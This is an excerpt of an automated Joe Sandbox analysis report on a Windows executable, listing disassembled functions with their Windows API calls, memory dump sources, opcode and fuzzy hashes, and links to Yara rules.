                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 1ca8d29a572ae3b7ff8c76547e4d65170e758091c5f4f47da2260b7b83d0dcdb
                                                                      • Instruction ID: fff644f1f1e00a205ed09ee00d4dfdbafb0d2cc3055f575070397b793bdfeb5a
                                                                      • Opcode Fuzzy Hash: 1ca8d29a572ae3b7ff8c76547e4d65170e758091c5f4f47da2260b7b83d0dcdb
                                                                      • Instruction Fuzzy Hash: 34F01932442A12ABDB455FA4EECCBDABA29BF01702F502226F202908A1C7749975CF91
                                                                      Function 00C25D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClientRect.USER32(?,?), ref: 00C25D30
                                                                      • GetWindowRect.USER32(?,?), ref: 00C25D71
                                                                      • ScreenToClient.USER32(?,?), ref: 00C25D99
                                                                      • GetClientRect.USER32(?,?), ref: 00C25ED7
                                                                      • GetWindowRect.USER32(?,?), ref: 00C25EF8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$Client$Window$Screen
                                                                      • String ID:
                                                                      • API String ID: 1296646539-0
                                                                      • Opcode ID: b2d628629851a71abe5f436a9866d2b5a3d1b085cc691245937b099c67b91e87
                                                                      • Instruction ID: 7417e87ca0848837d54a78f6b5668353b15c20f217c3c9ad36fddc0b7ada4003
                                                                      • Opcode Fuzzy Hash: b2d628629851a71abe5f436a9866d2b5a3d1b085cc691245937b099c67b91e87
                                                                      • Instruction Fuzzy Hash: 11B17874A00B4ADBDB24CFA9C4807EEB7F1FF58310F14851AE8A9D7690DB34AA51DB50
                                                                      Function 00C4FF2D Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __allrem.LIBCMT ref: 00C500BA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C500D6
                                                                      • __allrem.LIBCMT ref: 00C500ED
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C5010B
                                                                      • __allrem.LIBCMT ref: 00C50122
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C50140
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                      • String ID:
                                                                      • API String ID: 1992179935-0
                                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction ID: 1204c1b6e124a4d6e77624994844cdb107d0186a3f21ac1fad389749a2a5002b
                                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                      • Instruction Fuzzy Hash: DB81087AA00B069BE7209F68CC42B6F77E8AF41325F24413EFC21D6681E770DA899755
                                                                      Function 00C51B0F Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C51B9F
                                                                      • _free.LIBCMT ref: 00C51BB9
                                                                      • _free.LIBCMT ref: 00C51BC4
                                                                      • _free.LIBCMT ref: 00C51C98
                                                                      • _free.LIBCMT ref: 00C51CB4
                                                                        • Part of subcall function 00C527FC: IsProcessorFeaturePresent.KERNEL32(00000017,00C527EB,?,?,?,?,?,?,?,?,00C527F8,00000000,00000000,00000000,00000000,00000000), ref: 00C527FE
                                                                        • Part of subcall function 00C527FC: GetCurrentProcess.KERNEL32(C0000417), ref: 00C52820
                                                                        • Part of subcall function 00C527FC: TerminateProcess.KERNEL32(00000000), ref: 00C52827
                                                                      • _free.LIBCMT ref: 00C51CBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$Process$CurrentFeaturePresentProcessorTerminate
                                                                      • String ID:
                                                                      • API String ID: 2329545287-0
                                                                      • Opcode ID: ce5445a176509108f1d04d0cabb4a20a2b286554709af09773f197c8f2e1bdf4
                                                                      • Instruction ID: af3d3bfb63ed6826f61314a5ad25adbdf531388f2409aa6adf4908af5b6a089c
                                                                      • Opcode Fuzzy Hash: ce5445a176509108f1d04d0cabb4a20a2b286554709af09773f197c8f2e1bdf4
                                                                      • Instruction Fuzzy Hash: 6351CE7E9042045BDF249F68D845BBAB7E8DF45366F2C015DFC049B241E632AEC98398
                                                                      Function 00C561FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00C482D9,00C482D9,?,?,?,00C5644F,00000001,00000001,8BE85006), ref: 00C56258
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00C5644F,00000001,00000001,8BE85006,?,?,?), ref: 00C562DE
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00C563D8
                                                                      • __freea.LIBCMT ref: 00C563E5
                                                                        • Part of subcall function 00C53820: RtlAllocateHeap.NTDLL(00000000,?,00CF1444,?,00C3FDF5,?,?,00C2A976,00000010,00CF1440,00C213FC,?,00C213C6,?,00C21129), ref: 00C53852
                                                                      • __freea.LIBCMT ref: 00C563EE
                                                                      • __freea.LIBCMT ref: 00C56413
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1414292761-0
                                                                      • Opcode ID: eb6297cff7d4217afb6b086fc972d790ce0573bd6f99cc5f815b4b73de2210b2
                                                                      • Instruction ID: 54b887fd6fa2180423730db8a81e5e33e25cd9e73069f8a996c8404f625376ba
                                                                      • Opcode Fuzzy Hash: eb6297cff7d4217afb6b086fc972d790ce0573bd6f99cc5f815b4b73de2210b2
                                                                      • Instruction Fuzzy Hash: A0514276600206ABEB258F64CC81FAF7BA9EF40752F540228FD15D7150EB30DDC8D668
                                                                      Function 00C7F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000035), ref: 00C7F7B9
                                                                      • SysAllocString.OLEAUT32(00000001), ref: 00C7F860
                                                                      • VariantCopy.OLEAUT32(00C7FA64,00000000), ref: 00C7F889
                                                                      • VariantClear.OLEAUT32(00C7FA64), ref: 00C7F8AD
                                                                      • VariantCopy.OLEAUT32(00C7FA64,00000000), ref: 00C7F8B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7F8BB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                      • String ID:
                                                                      • API String ID: 3859894641-0
                                                                      • Opcode ID: 6094626367ef23155693732a41b922de3b064320bdb01a2178acdb3be6c05f65
                                                                      • Instruction ID: 990e37dac8d1bbf010a18450e8c51687961d76f34644beff303bfc776984eb10
                                                                      • Opcode Fuzzy Hash: 6094626367ef23155693732a41b922de3b064320bdb01a2178acdb3be6c05f65
                                                                      • Instruction Fuzzy Hash: 7851A431510310AACF24AF66D8D5B69B3A4FF45310F24D46EE909EF291DB708D42DB66
                                                                      Function 00C9910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00C994E5
                                                                      • _wcslen.LIBCMT ref: 00C99506
                                                                      • _wcslen.LIBCMT ref: 00C9952D
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00C99585
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                      • String ID: X
                                                                      • API String ID: 83654149-3081909835
                                                                      • Opcode ID: 1af749f86e90c93eb5adbb8d265054023e3093db117c7c187fae35431c0144b8
                                                                      • Instruction ID: 20f26777dacd9138a649f68ff72ee51f90cd663b514d1dcf9649090f1d9d4e05
                                                                      • Opcode Fuzzy Hash: 1af749f86e90c93eb5adbb8d265054023e3093db117c7c187fae35431c0144b8
                                                                      • Instruction Fuzzy Hash: 3DE1B2315083519FCB24EF28D485B6AB7E4FF85310F04896DF8999B2A2DB31DD05CB92
                                                                      Function 00C9648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C964DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00C96639
                                                                      • CoCreateInstance.OLE32(00CBFCF8,00000000,00000001,00CBFB68,?), ref: 00C96650
                                                                      • CoUninitialize.OLE32 ref: 00C968D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: a850f8605042a1667c0f79272fa434de86bd88a0441e4bc049ec7c86e2ffc337
                                                                      • Instruction ID: 2f8a7ae5ca490946edc82139a422ab9b74beba1427033d999e81a3021b2fe96f
                                                                      • Opcode Fuzzy Hash: a850f8605042a1667c0f79272fa434de86bd88a0441e4bc049ec7c86e2ffc337
                                                                      • Instruction Fuzzy Hash: 65D14971508211AFC704EF24D895E6BB7E8FF98704F00496DF5958B2A1DB71EE09CBA2
                                                                      Function 00C3920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • BeginPaint.USER32(?,?,?), ref: 00C39241
                                                                      • GetWindowRect.USER32(?,?), ref: 00C392A5
                                                                      • ScreenToClient.USER32(?,?), ref: 00C392C2
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C392D3
                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00C39321
                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00C771EA
                                                                        • Part of subcall function 00C39339: BeginPath.GDI32(00000000), ref: 00C39357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 3050599898-0
                                                                      • Opcode ID: adf8c78dc13431891a6aa79961793355daf014d0d4803785ac40ed104481342e
                                                                      • Instruction ID: a4705835bcde36f9d4a0b90625ac400f8eb97127c83331f0854cf097d2d16234
                                                                      • Opcode Fuzzy Hash: adf8c78dc13431891a6aa79961793355daf014d0d4803785ac40ed104481342e
                                                                      • Instruction Fuzzy Hash: 5341AC70104200EFD721DF25DCC4FBA7BB8EB45324F040269F9A9972B1C7B19945DBA2
                                                                      Function 00C907EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C9080C
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00C90847
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00C90863
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00C908DC
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00C908F3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C90921
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3368777196-0
                                                                      • Opcode ID: bbfc6d41741fb44fbbe4a8031098e0fb04c352948227e46a330129c8daede664
                                                                      • Instruction ID: b6f6c1e65d4c285d3e685e472c2a45b3fd74e5234dbae69bdfe51df2a36fc2ee
                                                                      • Opcode Fuzzy Hash: bbfc6d41741fb44fbbe4a8031098e0fb04c352948227e46a330129c8daede664
                                                                      • Instruction Fuzzy Hash: 1A416871A00205EFDF14AF54DC85AAA77B8FF04300F2440A9ED00AA297DB30DE65DBA4
                                                                      Function 00CB81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00C7F3AB,00000000,?,?,00000000,?,00C7682C,00000004,00000000,00000000), ref: 00CB824C
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00CB8272
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00CB82D1
                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00CB82E5
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00CB830B
                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00CB832F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: 825c9dc925f7c1c0182efeaf11900bb516e2e15922d6801eea108be3978c4236
                                                                      • Instruction ID: 4a80379c8908f9b9f9b210089d09961daea0fee67ef84f02f58cae23bdd6ba2b
                                                                      • Opcode Fuzzy Hash: 825c9dc925f7c1c0182efeaf11900bb516e2e15922d6801eea108be3978c4236
                                                                      • Instruction Fuzzy Hash: 27419434601644EFDF11CF15C899BE87BE4BB1A714F1842A9E9184F272CB71AE49CB52
                                                                      Function 00C84C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00C84C95
                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C84CB2
                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C84CEA
                                                                      • _wcslen.LIBCMT ref: 00C84D08
                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C84D10
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00C84D1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                      • String ID:
                                                                      • API String ID: 72514467-0
                                                                      • Opcode ID: 0261724151816776769f577871d5fdb83ca55115336ebbf01fe522933fd3ee5e
                                                                      • Instruction ID: 4656be4d90b0af2b7b4eb8087158d82014da3003959322e8cfc53af23865882e
                                                                      • Opcode Fuzzy Hash: 0261724151816776769f577871d5fdb83ca55115336ebbf01fe522933fd3ee5e
                                                                      • Instruction Fuzzy Hash: 79210872604211BBEB196B3AEC49F7F7BACDF45754F10803EF805CA191EA61DD0197A4
                                                                      Function 00C9581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                      • _wcslen.LIBCMT ref: 00C9587B
                                                                      • CoInitialize.OLE32(00000000), ref: 00C95995
                                                                      • CoCreateInstance.OLE32(00CBFCF8,00000000,00000001,00CBFB68,?), ref: 00C959AE
                                                                      • CoUninitialize.OLE32 ref: 00C959CC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 3172280962-24824748
                                                                      • Opcode ID: 289912d2cd243c56ee1e39308b4bf9d6c74d043426857d812cb1cd75b161ff22
                                                                      • Instruction ID: e22d39b16fb5e12e03e240869af5bf18fad8fc768d51ed5b84a399aa9146ce26
                                                                      • Opcode Fuzzy Hash: 289912d2cd243c56ee1e39308b4bf9d6c74d043426857d812cb1cd75b161ff22
                                                                      • Instruction Fuzzy Hash: B4D164716047119FCB14DF28C488A2ABBE1FF89710F14896DF8999B361DB31ED46CB92
                                                                      Function 00C8175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C80FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C80FCA
                                                                        • Part of subcall function 00C80FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C80FD6
                                                                        • Part of subcall function 00C80FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C80FE5
                                                                        • Part of subcall function 00C80FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C80FEC
                                                                        • Part of subcall function 00C80FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C81002
                                                                      • GetLengthSid.ADVAPI32(?,00000000,00C81335), ref: 00C817AE
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C817BA
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C817C1
                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C817DA
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00C81335), ref: 00C817EE
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C817F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                      • String ID:
                                                                      • API String ID: 3008561057-0
                                                                      • Opcode ID: 461e2410121c2f70899a3c652562ad7e41e8d14b9c031eb39232218fe05e4491
                                                                      • Instruction ID: 7cfab86b4829dc61cfed4071c72a26bfb71d5cccdcb666b337f77d58bf156137
                                                                      • Opcode Fuzzy Hash: 461e2410121c2f70899a3c652562ad7e41e8d14b9c031eb39232218fe05e4491
                                                                      • Instruction Fuzzy Hash: C411AC72500205FFDB10AFA8DC89BAE7BEDEB41359F18411DF881A7210C735AA45CB64
